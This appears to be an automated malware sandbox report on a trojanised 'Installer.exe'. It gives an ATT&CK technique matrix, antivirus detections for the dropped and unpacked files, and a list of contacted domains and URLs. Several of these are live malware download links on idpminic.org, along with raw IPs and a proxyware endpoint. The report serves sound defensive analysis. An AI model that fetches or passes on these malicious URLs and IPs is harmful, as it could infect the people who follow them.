Local Accounts	212 Command and Scripting Interpreter	Logon Script (Mac)	11 Scheduled Task/Job	11 Software Packing	NTDS	561 Security Software Discovery	Distributed Component Object Model	1 Input Capture	Scheduled Transfer	114 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	11 Scheduled Task/Job	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	11 Process Discovery	SSH	1 Clipboard Data	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	1 Service Execution	Rc.common	Rc.common	1 DLL Side-Loading	Cached Domain Credentials	251 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	1 PowerShell	Startup Items	Startup Items	1 File Deletion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	222 Masquerading	Proc Filesystem	1 Remote System Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	2 Modify Registry	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	251 Virtualization/Sandbox Evasion	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	611 Process Injection	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Installer.exe	73%	ReversingLabs	Win32.Trojan.Lazy
Installer.exe	68%	Virustotal		Browse
Installer.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files\Google\Chrome\updater.exe	100%	Avira	TR/AD.Nekark.cgoeo
C:\Users\user\AppData\Local\Temp\7321.tmp	100%	Avira	TR/Dropper.MSIL.Gen
C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	100%	Avira	HEUR/AGEN.1213193
C:\Users\user\AppData\LocalLow\MfU3390p.exe	100%	Avira	TR/Agent.xvjcn
C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	100%	Avira	TR/AD.Nekark.avjnn
C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	100%	Avira	TR/AD.Nekark.cgoeo
C:\Users\user\AppData\Local\Temp\7321.tmp	100%	Joe Sandbox ML
C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\LocalLow\MfU3390p.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	100%	Joe Sandbox ML
C:\Program Files\Google\Chrome\updater.exe	81%	ReversingLabs	Win64.Trojan.SpyLoader
C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	88%	ReversingLabs	Win64.Trojan.SpyLoader
C:\Users\user\AppData\LocalLow\MfU3390p.exe	80%	ReversingLabs	Win32.Trojan.Malgent
C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	85%	ReversingLabs	Win32.Trojan.Tiggre
C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	81%	ReversingLabs	Win32.Trojan.Lazy
C:\Users\user\AppData\LocalLow\freebl3.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\mozglue.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\msvcp140.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\nss3.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\softokn3.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\sqlite3.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\7321.tmp	81%	ReversingLabs	ByteCode-MSIL.Trojan.Lazy
C:\Windows\GoogleUpdate.exe	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
34.2.GoogleUpdate.exe.a80000.1.unpack	100%	Avira	HEUR/AGEN.1253834	Download File
70.2.dllhost.exe.23bed1b0000.3.unpack	100%	Avira	HEUR/AGEN.1251517	Download File
70.2.dllhost.exe.140000000.0.unpack	100%	Avira	HEUR/AGEN.1251517	Download File
55.2.dialer.exe.7ff6cf740000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen	Download File
4.2.OBH7JYJN.exe.1000000.0.unpack	100%	Avira	HEUR/AGEN.1213193	Download File
33.2.OBH7JYJN.exe.1000000.0.unpack	100%	Avira	HEUR/AGEN.1213193	Download File
42.2.MfU3390p.exe.c20000.1.unpack	100%	Avira	HEUR/AGEN.1253834	Download File
55.0.dialer.exe.7ff6cf740000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen	Download File
51.2.OBH7JYJN.exe.1000000.0.unpack	100%	Avira	HEUR/AGEN.1213193	Download File
0.0.Installer.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.Installer.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
55.0.dialer.exe.7ff6cf740000.2.unpack	100%	Avira	TR/Dropper.MSIL.Gen	Download File
34.2.GoogleUpdate.exe.f80000.2.unpack	100%	Avira	TR/TDSS.Gen2	Download File
69.2.audiodg.exe.1e0e6c60000.1.unpack	100%	Avira	HEUR/AGEN.1251517	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://go.micro	0%	URL Reputation	safe
http://www.microsoft.	0%	URL Reputation	safe
http://crl.m	0%	URL Reputation	safe
https://mozilla.org0	0%	URL Reputation	safe
https://api.peer2profit.com/lq	0%	Avira URL Cloud	safe
http://www.idpminic.org/aula/hiuhehufw.exe	100%	Avira URL Cloud	malware
https://api.peer2profit.com/vc6	0%	Avira URL Cloud	safe
https://api.peer2profit.com/;	0%	Avira URL Cloud	safe
https://api.peer2profit.com/api/proxy/nodes/gett	0%	Avira URL Cloud	safe
http://www.idpminic.org/aula/ofg7d45fsdfgg312.exel	0%	Avira URL Cloud	safe
https://api.peer2profit.com/api/proxy/nodes/get4z	0%	Avira URL Cloud	safe
https://api.peer2profit.com/I	0%	Avira URL Cloud	safe
https://api.peer2profit.com/api/proxy/nodes/getl	0%	Avira URL Cloud	safe
https://api.peer2profit.com/api/proxy/nodes/geti	0%	Avira URL Cloud	safe
https://api.peer2profit.com/hy	0%	Avira URL Cloud	safe
https://api.peer2profit.com/la	0%	Avira URL Cloud	safe
https://api.peer2profit.com/-	0%	Avira URL Cloud	safe
https://api.peer2profit.com/api/proxy/nodes/getb	0%	Avira URL Cloud	safe
https://api.peer2profit.com/api/proxy/nodes/gett	1%	Virustotal		Browse
https://api.peer2profit.com/lg	0%	Avira URL Cloud	safe
https://api.peer2profit.com/ll	0%	Avira URL Cloud	safe
https://api.peer2profit.com/api/proxy/nodes/getuz	0%	Avira URL Cloud	safe
https://api.peer2profit.com/h	0%	Avira URL Cloud	safe
https://api.peer2profit.com/oft	0%	Avira URL Cloud	safe
http://109.107.173.210/	0%	Avira URL Cloud	safe
http://www.idpminic.org/aula/ofg7d45fsdfgg312.exe	100%	Avira URL Cloud	malware
http://www.idpminic.org/aula/dmi1dfg7n.exe	100%	Avira URL Cloud	malware
https://api.peer2profit.com/r2profit.com/	0%	Avira URL Cloud	safe
http://www.idpminic.org/aula/f429fjd4uf84u.exe	100%	Avira URL Cloud	malware
https://api.peer2profit.com/api/proxy/nodes/get#z1	0%	Avira URL Cloud	safe
https://api.peer2profit.com/L	0%	Avira URL Cloud	safe
https://api.peer2profit.com/api/proxy/nodes/get	0%	Avira URL Cloud	safe
https://api.peer2profit.com/l2	0%	Avira URL Cloud	safe
https://api.peer2profit.com/api/proxy/nodes/get4	0%	Avira URL Cloud	safe
https://api.peer2profit.com/llg	0%	Avira URL Cloud	safe
https://api.peer2profit.com/My	0%	Avira URL Cloud	safe
https://api.peer2profit.com/api/proxy/nodes/get0	0%	Avira URL Cloud	safe
http://www.idpminic.org/aula/hiuhehufw.exe%	0%	Avira URL Cloud	safe
https://api.peer2profit.com/q	0%	Avira URL Cloud	safe
https://api.peer2profit.com/p	0%	Avira URL Cloud	safe
https://api.peer2profit.com/llZ	0%	Avira URL Cloud	safe
https://api.peer2profit.com/t	0%	Avira URL Cloud	safe
https://api.peer2profit.com/api/proxy/nodes/getV	0%	Avira URL Cloud	safe
http://109.107.173.210/9750e253ec094d6b15b667e8c84d2165	0%	Avira URL Cloud	safe
https://api.peer2profit.com/lU	0%	Avira URL Cloud	safe
https://api.peer2profit.com/api/proxy/nodes/get9z	0%	Avira URL Cloud	safe
https://api.peer2profit.com/ll;	0%	Avira URL Cloud	safe
https://api.peer2profit.com/$	0%	Avira URL Cloud	safe
https://api.peer2profit.com/api/proxy/nodes/getE	0%	Avira URL Cloud	safe
https://api.peer2profit.com/hy$	0%	Avira URL Cloud	safe
https://api.peer2profit.com/api/proxy/nodes/getF	0%	Avira URL Cloud	safe
https://api.peer2profit.com/api/proxy/nodes/getC	0%	Avira URL Cloud	safe
https://api.peer2profit.com/	0%	Avira URL Cloud	safe
https://api.peer2profit.com/api/proxy/nodes/get?	0%	Avira URL Cloud	safe
http://89.208.137.159:5200/add/	0%	Avira URL Cloud	safe
http://www.idpminic.org/aula/hiuhehufw.exe1	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
api.peer2profit.com	172.66.40.196	true	false	high
idpminic.org	66.235.200.147	true	false	high
www.idpminic.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.idpminic.org/aula/hiuhehufw.exe	true	Avira URL Cloud: malware	unknown
http://109.107.173.210/	true	Avira URL Cloud: safe	unknown
http://www.idpminic.org/aula/ofg7d45fsdfgg312.exe	true	Avira URL Cloud: malware	unknown
http://www.idpminic.org/aula/dmi1dfg7n.exe	true	Avira URL Cloud: malware	unknown
http://www.idpminic.org/aula/f429fjd4uf84u.exe	true	Avira URL Cloud: malware	unknown
https://api.peer2profit.com/api/proxy/nodes/get	true	Avira URL Cloud: safe	unknown
http://109.107.173.210/9750e253ec094d6b15b667e8c84d2165	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.peer2profit.com/lq	GoogleUpdate.exe, 00000022.00000003.468076833.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	Installer.exe, 00000000.00000003.345773306.000000000474E000.00000004.00000800.00020000.00000000.sdmp, uHCH8yr185HV.0.dr	false		high
https://api.peer2profit.com/api/proxy/nodes/gett	GoogleUpdate.exe, 00000022.00000002.642565365.0000000000A50000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	uHCH8yr185HV.0.dr	false		high
https://api.peer2profit.com/vc6	GoogleUpdate.exe, 00000022.00000003.458747418.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.456827596.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.461540880.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.468076833.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.463095135.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.466378251.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.460081266.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.454959829.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.464619971.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.469854781.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.peer2profit.com/;	GoogleUpdate.exe, 00000022.00000003.458747418.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.456827596.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot	NtjHIfvQ.exe, 00000026.00000000.418888159.0000000000AC2000.00000002.00000001.01000000.0000000F.sdmp	false		high
http://www.idpminic.org/aula/ofg7d45fsdfgg312.exel	Installer.exe, 00000000.00000002.470899679.000000000475F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.peer2profit.com/api/proxy/nodes/get4z	GoogleUpdate.exe, 00000022.00000002.633531993.00000000009E5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.peer2profit.com/I	GoogleUpdate.exe, 00000022.00000003.456827596.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.peer2profit.com/api/proxy/nodes/getl	GoogleUpdate.exe, 00000022.00000002.633531993.00000000009E5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.peer2profit.com/api/proxy/nodes/geti	GoogleUpdate.exe, 00000022.00000002.642565365.0000000000A50000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.peer2profit.com/hy	GoogleUpdate.exe, 00000022.00000003.468076833.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.577892980.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.500075907.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.572523796.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.469854781.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.peer2profit.com/la	GoogleUpdate.exe, 00000022.00000003.538069535.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.550388370.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.545946111.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.542977658.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.466378251.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.472841393.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.555177776.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://search.yahoo.com?fr=crmas_sfpf	Installer.exe, 00000000.00000003.345773306.000000000474E000.00000004.00000800.00020000.00000000.sdmp, uHCH8yr185HV.0.dr	false		high
https://api.peer2profit.com/-	GoogleUpdate.exe, 00000022.00000003.555177776.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.peer2profit.com/api/proxy/nodes/getb	GoogleUpdate.exe, 00000022.00000002.642565365.0000000000A50000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.peer2profit.com/lg	GoogleUpdate.exe, 00000022.00000003.458747418.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.peer2profit.com/ll	GoogleUpdate.exe, 00000022.00000003.488015285.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.562470229.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.peer2profit.com/api/proxy/nodes/getuz	GoogleUpdate.exe, 00000022.00000002.633531993.00000000009E5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.peer2profit.com/h	GoogleUpdate.exe, 00000022.00000003.461540880.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.peer2profit.com/oft	GoogleUpdate.exe, 00000022.00000003.572523796.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.peer2profit.com/r2profit.com/	GoogleUpdate.exe, 00000022.00000003.508678490.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.577892980.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.575103795.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.569372326.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.572523796.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.562470229.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.peer2profit.com/api/proxy/nodes/get#z1	GoogleUpdate.exe, 00000022.00000002.633531993.00000000009E5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.peer2profit.com/L	GoogleUpdate.exe, 00000022.00000003.454959829.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000003A.00000002.572749249.000001ACD5621000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sqlite.org/copyright.html.	sqlite3.dll.0.dr	false		high
https://api.peer2profit.com/l2	GoogleUpdate.exe, 00000022.00000003.472841393.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.peer2profit.com/api/proxy/nodes/get4	GoogleUpdate.exe, 00000022.00000003.456827596.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.461540880.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.575103795.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.500075907.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.463095135.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.488015285.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.545946111.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.466378251.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.460081266.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.454959829.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.472841393.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.464619971.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.555177776.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.469854781.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.peer2profit.com/llg	GoogleUpdate.exe, 00000022.00000003.472841393.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Installer.exe, 00000000.00000003.345773306.000000000474E000.00000004.00000800.00020000.00000000.sdmp, uHCH8yr185HV.0.dr	false		high
https://api.peer2profit.com/My	GoogleUpdate.exe, 00000022.00000003.458747418.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.461540880.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000002.635713610.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.577892980.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.538069535.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.575103795.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.463095135.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.494636129.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.542977658.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.466378251.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.498202955.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.464619971.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.peer2profit.com/api/proxy/nodes/get0	GoogleUpdate.exe, 00000022.00000002.633531993.00000000009E5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.idpminic.org/aula/hiuhehufw.exe%	Installer.exe, 00000000.00000002.469744760.0000000004720000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://go.micro	powershell.exe, 0000003A.00000002.589046846.000001ACD5829000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.peer2profit.com/q	GoogleUpdate.exe, 00000022.00000003.464619971.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	uHCH8yr185HV.0.dr	false		high
https://api.peer2profit.com/p	GoogleUpdate.exe, 00000022.00000003.472841393.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoft.	powershell.exe, 00000009.00000003.448630063.000001D4E3943000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000003.446258088.000001D4E3943000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	Installer.exe, 00000000.00000003.345773306.000000000474E000.00000004.00000800.00020000.00000000.sdmp, uHCH8yr185HV.0.dr	false		high
https://api.peer2profit.com/l	GoogleUpdate.exe, 00000022.00000003.458747418.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.508678490.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.468076833.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000002.635713610.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.538069535.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.575103795.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.500075907.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.463095135.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.569372326.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.494636129.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.488015285.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.550388370.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.562470229.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.545946111.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.542977658.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.555177776.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.469854781.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://api.peer2profit.com/llZ	GoogleUpdate.exe, 00000022.00000003.464619971.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=	Installer.exe, 00000000.00000003.345773306.000000000474E000.00000004.00000800.00020000.00000000.sdmp, uHCH8yr185HV.0.dr	false		high
https://api.peer2profit.com/t	GoogleUpdate.exe, 00000022.00000003.452830772.00000000009CF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	uHCH8yr185HV.0.dr	false		high
https://search.yahoo.com?fr=crmas_sfp	Installer.exe, 00000000.00000003.345773306.000000000474E000.00000004.00000800.00020000.00000000.sdmp, uHCH8yr185HV.0.dr	false		high
https://api.peer2profit.com/api/proxy/nodes/getV	GoogleUpdate.exe, 00000022.00000002.633531993.00000000009E5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.m	powershell.exe, 00000015.00000003.452301546.0000000007741000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.peer2profit.com/lU	GoogleUpdate.exe, 00000022.00000003.472841393.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.peer2profit.com/ll;	GoogleUpdate.exe, 00000022.00000003.577892980.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.569372326.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.peer2profit.com/api/proxy/nodes/get9z	GoogleUpdate.exe, 00000022.00000002.633531993.00000000009E5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.peer2profit.com/$	GoogleUpdate.exe, 00000022.00000003.461540880.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.460081266.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.peer2profit.com/api/proxy/nodes/getE	GoogleUpdate.exe, 00000022.00000002.633531993.00000000009E5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.peer2profit.com/hy$	GoogleUpdate.exe, 00000022.00000003.468076833.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.472841393.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.469854781.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.peer2profit.com/api/proxy/nodes/getF	GoogleUpdate.exe, 00000022.00000003.508678490.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.577892980.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.538069535.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.575103795.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.500075907.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.569372326.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.572523796.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.494636129.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.488015285.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.550388370.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.562470229.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.545946111.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.542977658.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.498202955.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.555177776.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
